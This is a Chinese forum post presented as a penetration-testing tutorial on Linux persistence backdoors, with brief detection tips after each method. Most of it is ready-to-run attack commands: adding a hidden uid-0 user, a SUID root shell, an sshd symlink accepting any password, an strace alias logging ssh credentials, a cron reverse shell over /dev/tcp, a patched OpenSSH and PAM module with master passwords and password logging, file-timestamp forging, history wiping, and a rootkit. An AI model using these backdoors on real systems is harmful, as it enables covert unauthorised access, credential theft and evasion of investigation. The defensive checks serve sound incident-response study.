【大白分享】渗透安全之Linux权限维持后门铸造篇
  

山东_朱文鑫 68592人觉得有帮助

{{ttag.title}}
本帖最后由 山东_朱文鑫 于 2023-6-22 23:45 编辑

大家好,我是大白,正所谓夏色倚青艾,粽香礼佳人。依旧感谢各位小伙伴的一路支持与陪伴,同时也祝各位小伙伴端午节快乐!!!!



*本篇章将本着学习的态度进行分享,严禁用于个人非法行为以及黑产获取!!!!



今天分享大白的渗透安全之Linux权限维持后门铸造篇,上一篇我们分享的是Linux后门隐藏篇,那么本次是针对Linux系统的后门铸造篇,同样还是对于好多小伙伴来说,这个更加偏向于安服,总体来说确实更加偏向于安服但是对于安全知识的了解以及更加层次的学习甚至使用都比较重要,我们可以一同研习一下渗透攻防的“魅力”。


那我们开始今天的分享:


一句话添加用户和密码

添加普通用户:

  1. # 创建一个用户名guest,密码123456的普通用户
  2. useradd -p `openssl passwd -1 -salt 'salt' 123456` guest

  3. # useradd -p 方法  ` ` 是用来存放可执行的系统命令,"$()"也可以存放命令执行语句
  4. useradd -p "$(openssl passwd -1 123456)" guest

  5. # chpasswd方法
  6. useradd guest;echo 'guest:123456'|chpasswd

  7. # echo -e方法
  8. useradd test;echo -e "123456\n123456\n" |passwd test
复制代码


添加root用户:


  1. # 创建一个用户名guest,密码123456的root用户
  2. useradd -p `openssl passwd -1 -salt 'salt' 123456` guest -o -u 0 -g root -G root -s /bin/bash -d /home/test
复制代码

可疑用户排查技巧:


  1. # 查询特权用户特权用户(uid 为0)
  2. [root@localhost ~]# awk -F: '$3==0{print $1}' /etc/passwd
  3. # 查询可以远程登录的帐号信息
  4. [root@localhost ~]# awk '/\$1|\$6/{print $1}' /etc/shadow
  5. # 除root帐号外,其他帐号是否存在sudo权限。如非管理需要,普通帐号应删除sudo权限
  6. [root@localhost ~]# more /etc/sudoers | grep -v "^#\|^[        DISCUZ_CODE_2        ]quot; | grep "ALL=(ALL)"
复制代码


SUID Shell

Suid shell是一种可用于以拥有者权限运行的shell。

  1. 配合普通用户权限使用
  2. cp /bin/bash /tmp/shell
  3. chmod u+s /tmp/shell
复制代码

使用guest用户登录就可疑获取root权限。



备注:bash2针对suid做了一些防护措施,需要使用-p参数来获取一个root shell。另外,普通用户执行这个SUID shell时,一定要使用全路径。

排查技巧:

  1. # 在Linux中查找SUID设置的文件
  2. find . -perm /4000
  3. # 在Linux中查找使用SGID设置的文件
  4. find . -perm /2000
  5. # 取消s权限
  6. chmod u-s /tmp/shell
复制代码

ssh公私钥免密登录

在客户端上生成一对公私钥,然后把公钥放到服务器上(~/.ssh/authorized_keys),保留私钥。当ssh登录时,ssh程序会发送私钥去和服务器上的公钥做匹配。如果匹配成功就可以登录了。

客户端:

  1. ssh-keygen -t rsa
复制代码

过程中按三次回车,执行结束如下图:



进入/root/.ssh/文件夹,查看文件夹的内容,如下所示:




其中 id_rsa为私钥,id_rsa.pub为公钥,接下来打开id_rsa.pub,将内容复制到服务器。将id_rsa.pub的内容追加到/root/.ssh/authorized_keys内,配置完成。

排查技巧:查看/root/.ssh/authorized_keys是否被修改。

软连接

在sshd服务配置运行PAM认证的前提下,PAM配置文件中控制标志为sufficient时只要pam_rootok模块检测uid为0即root权限即可成功认证登陆。通过软连接的方式,实质上PAM认证是通过软连接的文件名 /tmp/su 在/etc/pam.d/目录下寻找对应的PAM配置文件(如: /etc/pam.d/su),任意密码登陆的核心是auth sufficient pam_rootok.so,所以只要PAM配置文件中包含此配置即可SSH任意密码登陆,除了su中之外还有chsh、chfn同样可以。

在目标服务器上执行一句话后门:

  1. ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=8888
复制代码

执行完之后,任何一台机器ssh root@IP -p 8888,输入任意密码,成功登录。



排查技巧:


  1. # ls -al /usr/sbin/sshd
  2. # cat /usr/sbin/sshd
  3. 可通过重装ssh服务恢复。
复制代码


strace后门

通过命令替换动态跟踪系统调用和数据,可以用来记录用户ssh、su、sudo的操作。

  1. #vim /etc/bashrc
  2. alias ssh='strace -o /tmp/.ssh.log -e read,write,connect -s 2048 ssh'
  3. # source /root/.bashrc
复制代码



排查技巧:使用alias即可发现异常。




crontab反弹shell

crontab命令用于设置周期性被执行的指令。新建shell脚本,利用脚本进行反弹。

a、创建shell脚本,例如在/etc/evil.sh

  1. #!/bin/bash
  2. bash -i >& /dev/tcp/IP地址/端口 0>&1
复制代码






b、crontab -e 设置定时任务


  1. #每一分钟执行一次
  2. */1 * * * * root /etc/evil.sh
复制代码


重启crond服务,service crond restart,然后就可以用nc接收shell。





排查技巧:


  1. # 查看可疑的定时任务列表
  2. crontab -e
复制代码


openssh后门

利用openssh后门,设置SSH后门密码及root密码记录位置,隐蔽性较强,不易被发现。

  1. a、备份SSH配置文件
  2. mv /etc/ssh/ssh_config /etc/ssh/ssh_config.old
  3. mv /etc/ssh/sshd_config /etc/ssh/sshd_config.old

  4. b、解压并安装补丁
  5. tar zxf openssh-5.9p1.tar.gz
  6. tar zxf openssh-5.9p1.tar.gz
  7. cp openssh-5.9p1.patch/sshbd5.9p1.diff  /openssh-5.9p1
  8. cd openssh-5.9p1
  9. patch < sshbd5.9p1.diff

  10. c、记录用户名和密码的文件位置及其密码
  11. vi  includes.h
  12.     #define ILOG "/tmp/1.txt"             //记录登录本机的用户名和密码
  13.     #define OLOG "/tmp/2.txt"             //记录本机登录远程的用户名和密码
  14.     #define SECRETPW "123456789"          //后门的密码

  15. d、修改版本信息
  16. vi version.h
  17.     #define SSH_VERSION "填入之前记下来的版本号,伪装原版本"
  18.     #define SSH_PORTABLE "小版本号"

  19. e、安装并编译
  20. ./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam --with-kerberos5
  21. make clean
  22. make && make install
  23. service sshd restart

  24. f、对比原来的配置文件,使配置文件一致,然后修改文件日期。

  25. touch -r  /etc/ssh/ssh_config.old /etc/ssh/ssh_config
  26. touch -r  /etc/ssh/sshd_config.old /etc/ssh/sshd_config

  27. g、清除操作记录
  28. export HISTFILE=/dev/null
  29. export HISTSIZE=0
  30. echo >/root/.bash_history //清空操作日志
复制代码
排查技巧:利用strace找出ssh后门.

  1. # 1、获取可疑进程PI
  2. ps aux | grep sshd
  3. # 2、跟踪sshd PID
  4. strace -o aa -ff -p  PID
  5. # 3、查看记录密码打开文件
  6. grep open sshd* | grep -v -e No -e  null -e denied| grep  WR
复制代码

PAM后门

PAM 是由Sun提出的一种认证机制。它通过提供一些动态链接库和一套统一的API,将系统提供的服务和该服务的认证方式分开,使得系统管理员可以灵活地根据需要给不同的服务配置不同的认证方式而无需更改服务程序,同时也便于向系统中添加新的认证手段。PAM最初是集成在Solaris中,目前已移植到其它系统中,如Linux、SunOS、HP-UX 9.0等。

利用方法:

  1. 1、获取目标系统所使用的PAM版本,下载对应版本的pam版本
  2. 2、解压缩,修改pam_unix_auth.c文件,添加万能密码
  3. 3、编译安装PAM
  4. 4、编译完后的文件在:modules/pam_unix/.libs/pam_unix.so,复制到/lib64/security中进行替换,即可使用万能密码登陆,并将用户名密码记录到文件中。
复制代码

排查技巧:

  1. # 1、通过Strace跟踪ssh
  2. ps axu | grep sshd
  3. strace -o aa -ff -p PID
  4. grep open aa* | grep -v -e No -e null -e denied| grep WR
  5. # 2、检查pam_unix.so的修改时间
  6. stat /lib/security/pam_unix.so      #32位
  7. stat /lib64/security/pam_unix.so    #64位
复制代码

rookit后门

Mafix是一款常用的轻量应用级别Rootkits,是通过伪造ssh协议漏洞实现远程登陆的特点是配置简单并可以自定义验证密码和端口号。

利用方法:安装完成后,使用ssh 用户@IP -P 配置的端口,即可远程登录。

连接后的截图:



排查技巧:查看端口是否异常,RPM check查看命令是否被替换。


*本篇章将本着学习的态度进行分享,严禁用于个人非法行为以及黑产获取,网络不是法外之地!!!!


以上就是本次的渗透安全之Windows权限维持后门隐藏篇,一句忠告:业务备份一时不做一时爽,问题出现两行泪,感谢大佬们的参阅,此贴先到这里后续会带上更加实用的帖子,感谢大家!

励志分享超清壁纸语句~~:





《端午日》唐·殷尧藩:

少年佳节倍多情,老去谁知感慨生。

不效艾符趋习俗,但祈蒲酒话升平。

鬓丝日日添白头,榴锦年年照眼明。

千载贤愚同瞬息,几人湮没几垂名。

好的今天就到这里,老样子,感谢各位大神的参阅,孩子为了挣豆子不容易,孩子家里穷没豆子吃饭了!!!

打赏鼓励作者,期待更多好文!

打赏
6人已打赏

এ塔铃独语别黄昏এ 发表于 2024-9-1 15:43
  
一起来学习,一起来学习
飞翔的苹果 发表于 2024-7-1 08:57
  
学习一下,增加处理经验
Hellos 发表于 2023-12-11 09:44
  
多谢楼主分享VPN的搭建方法,学习了。
新手716814 发表于 2023-10-17 09:01
  
老婆,用你发财的小手申购下茅台
新手626351 发表于 2023-10-16 09:30
  
学习到了,有助于工作!
dhf 发表于 2023-9-20 10:18
  
每日打卡学习,感谢分享,学习了!!!
一个无趣的人 发表于 2023-9-6 10:16
  
楼主的文章图文并茂,清晰易懂,看完这波操作可以轻松上手了,如遇到问题再向楼主请教~
平凡的小网工 发表于 2023-8-29 15:07
  
楼主的文章图文并茂,清晰易懂,看完这波操作可以轻松上手了,如遇到问题再向楼主请教~
发表新帖
热门标签
全部标签>
安全效果
西北区每日一问
技术盲盒
技术笔记
干货满满
【 社区to talk】
每日一问
信服课堂视频
GIF动图学习
新版本体验
技术咨询
2023技术争霸赛专题
功能体验
产品连连看
自助服务平台操作指引
标准化排查
秒懂零信任
技术晨报
安装部署配置
原创分享
排障笔记本
玩转零信任
排障那些事
SDP百科
技术争霸赛
深信服技术支持平台
通用技术
以战代练
升级&主动服务
社区新周刊
畅聊IT
答题自测
专家问答
技术圆桌
在线直播
MVP
网络基础知识
升级
安全攻防
上网策略
测试报告
日志审计
问题分析处理
流量管理
每日一记
运维工具
云计算知识
用户认证
解决方案
sangfor周刊
VPN 对接
项目案例
SANGFOR资讯
专家分享
技术顾问
信服故事
功能咨询
终端接入
授权
设备维护
资源访问
地址转换
虚拟机
存储
迁移
加速技术
产品预警公告
信服圈儿
S豆商城资讯
「智能机器人」
追光者计划
社区帮助指南
答题榜单公布
纪元平台
卧龙计划
华北区拉练
天逸直播
山东区技术晨报
文档捉虫活动
齐鲁TV
华北区交付直播
每周精选
2024年技术争霸赛
北京区每日一练
场景专题
故障笔记
高手请过招
高频问题集锦
POC测试案例
全能先锋系列
云化安全能力

本版版主

7
20
6

发帖

粉丝

关注

本版达人

ggbang

本周建议达人

adds

本周提问达人